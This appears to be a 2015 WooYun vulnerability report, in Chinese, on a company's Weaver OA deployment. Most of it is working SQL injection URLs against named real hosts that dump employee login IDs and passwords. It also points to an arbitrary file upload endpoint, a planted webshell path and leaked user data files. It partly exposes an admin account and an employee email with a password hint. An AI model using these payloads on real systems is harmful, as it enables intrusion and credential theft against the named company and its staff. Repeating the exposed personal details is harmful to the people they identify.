漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2015-12-08: 细节已通知厂商并且等待厂商处理中
2015-12-13: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
RT
详细说明:
主站801端口泛微OA
http://www.chanhen.com:801/web/careerapply/HrmCareerApplyPerView.jsp?id=1
通过编辑添加一行信息后,就可以注入了
直接上手工,全部人员信息
http://www.chanhen.com:801/web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResource
管理员信息
http://www.chanhen.com:801/web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourceManager
好多弱口令,登陆OA,大量敏感的文件~~~~~,包括企业的组织架构
sysadmin XXX103 登陆后台,各种敏感信息
2、http://xd.chanhen.com/web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResource
http://xd.chanhen.com/web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourcemanager
可以从数据库中拿到部分员工的邮箱帐号,密码是md5
wangk@chanhen.com
wkxxxxx 后面隐去
从邮箱中得到大量的工作的敏感信息~~~
3、http://xd.chanhen.com/messager/users.data 这里泄露了各种人员信息
http://www.chanhen.com:801/messager/users.data
4.http://ecis.chanhen.com:89 与xd的OA数据相通,可以直接登陆,里面有手机通信的信息
5、任意文件上传
http://www.chanhen.com:801/tools/SWFUpload/upload.jsp
shell
http://www.chanhen.com:801/nullwoo.jsp 已经发现被入侵痕迹
漏洞证明:
修复方案:
好像有8.0了,升级吧。。
版权声明:转载请注明来源 CapsLk@乌云
>
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-12-13 09:24
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
2015-12-16:已处理,感谢!





